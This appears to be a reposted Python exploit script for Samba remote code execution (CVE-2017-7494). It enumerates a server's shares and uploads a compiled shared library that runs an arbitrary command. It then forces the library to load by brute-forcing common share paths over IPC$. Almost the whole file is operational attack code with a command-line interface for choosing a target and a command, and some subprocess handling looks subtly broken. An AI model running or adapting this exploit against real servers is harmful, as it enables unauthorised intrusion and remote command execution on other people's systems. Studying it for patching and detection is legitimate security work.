# coding=utf-8# Exploit Title: Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code E

1. # coding=utf-8
2. # Exploit Title: Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution
3. # Date: 2017-05-31
4. # Exploit Author: avfisher (https://github.com/brianwrf/SambaHunter)
5. # Vendor Homepage: https://www.samba.org/
6. # Software Link: https://www.samba.org/samba/download/
7. # Version: 3.5.0 - 4.5.4/4.5.10/4.4.14
8. # Tested on: Ubuntu 16.04
9. # CVE : CVE-2017-7494
10.  
11. import subprocess
12. import sys
13. import re
14. import smbclient
15. import os
16. import argparse
17.  
18. share_type = [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ]
19. share_common_location = [ '/volume1', '/volume2', '/volume3', '/shared', '/mnt', '/mnt/usb', '/media', '/mnt/media', '/var/samba', '/tmp', '/home', '/home/shared' ]
20. temp_file_name = "temp_file"
21.  
22. def generate_payload(file_name, cmd):
23. content = '''
24. # include <stdio.h>
25. # include <stdlib.h>
26. int samba_init_module()
27. {
28. system("%s");
29. return 0;
30. }''' % cmd
31.  
32. payload = open(file_name + ".c", 'wb')
33. payload.write(content.strip())
34. payload.close()
35.  
36. compile_cmd = "gcc %s.c -shared -fPIC -o %s.so" % (file_name, file_name)
37. res = subprocess.run(compile_cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, check=True, universal_newlines=False)
38. status = res.returncode
39. output = res.stdout
40. if status == 0:
41. print("[*] Generate payload succeed: %s.so" % (os.path.dirname(os.path.realpath(__file__)) + '/' + file_name))
42. return file_name
43. else:
44. print("[!] Generate payload failed!")
45. exit()
46.  
47. def connect_smb(server, share_name):
48. smb = smbclient.SambaClient(server=server, share=share_name)
49. return smb
50.  
51. def verify_writeable_directory(smb, share_name):
52. file_name = temp_file_name
53. temp_file = open(file_name, 'w')
54. temp_file.write('test')
55. temp_file.close()
56. smb.upload(file_name, file_name)
57. if file_name in smb.listdir("/"):
58. print("Directory " + share_name + " is writeable")
59. try:
60. smb.remove(file_name)
61. except Exception as err:
62. pass
63. return True
64. return False
65.  
66. def upload_payload(smb, cmd):
67. payload_name = 'samba_' + str(os.getpid())
68. payload = generate_payload(payload_name, cmd)
69. try:
70. smb.upload(payload + '.so', payload + '.so')
71. except Exception as err:
72. pass
73. os.remove(payload + '.so')
74. os.remove(payload + '.c')
75. return payload
76.  
77. def brute_force_location(payload):
78. paths = []
79. for location in share_common_location:
80. paths.append(location + '/' + payload + '.so')
81. return paths
82.  
83. def exploit(server, path):
84. print("[+] Brute force exploit: %s" % path)
85. cmd = "smbclient //%s/IPC$ -k -c 'open %s'" % (server, path)
86. res = subprocess.run(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, check=True, universal_newlines=False)
87. status = res.returncode
88. output = res.stdout
89.  
90. def scan_share(server, share_name, cmd):
91. print("Scanning share: " + share_name)
92. try:
93. smb = connect_smb(server, share_name)
94. if verify_writeable_directory(smb, share_name):
95. payload = upload_payload(smb, cmd)
96. paths = brute_force_location(payload)
97. for path in paths:
98. exploit(server, path)
99. try:
100. smb.remove(payload + '.so')
101. except Exception as err:
102. pass
103. smb.close()
104. except Exception as err:
105. pass
106.  
107. def main():
108. banner = """
109.  
110. ____ _ _ _ _
111. / ___| __ _ _ __ ___ | |__ __ _| | | |_ _ _ __ | |_ ___ _ __
112. \___ \ / _` | '_ ` _ \| '_ \ / _` | |_| | | | | '_ \| __/ _ \ '__|
113. ___) | (_| | | | | | | |_) | (_| | _ | |_| | | | | || __/ |
114. |____/ \__,_|_| |_| |_|_.__/ \__,_|_| |_|\__,_|_| |_|\__\___|_|
115.  
116. # Exploit Author: avfisher (https://github.com/brianwrf)
117. # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution
118. # CVE-2017-7494
119. # Help: python sambahunter.py -h
120. """
121. print(banner)
122. parser = argparse.ArgumentParser()
123. parser.add_argument("-s", "--server", help="Server to target", type=str)
124. parser.add_argument("-c", "--command", help="Command to execute on target server", type=str)
125. args = parser.parse_args()
126.  
127. server = ''
128. cmd = ''
129.  
130. if args.server:
131. server = args.server
132. if args.command:
133. cmd = args.command
134.  
135. if server and cmd:
136. print("[*] Exploiting RCE for Samba (CVE-2017-7494)...")
137. print("[*] Server: %s" % server)
138. list_share_cmd = "smbclient -L %s -N" % (server)
139. res = subprocess.run(list_share_cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, check=True, universal_newlines=False)
140. status = res.returncode
141. output = res.stdout
142. if status == 0:
143. print(output)
144. shares = output.split('\n\t')
145. for share in shares:
146. if 'Samba' in share:
147. match = re.search('.*(Samba.*?)].*', share)
148. if match:
149. print("[*] Samba version: %s" % match.group(1))
150. for type in share_type:
151. if type.lower() in share.lower():
152. share_name = share.split(" ")[0]
153. scan_share(server, share_name, cmd)
154. print("[*] Exploit finished!")
155. else:
156. print("[!] Exploit failed!")
157. exit()
158. os.remove(temp_file_name)
159.  
160. if __name__ == '__main__':
161. main()
162.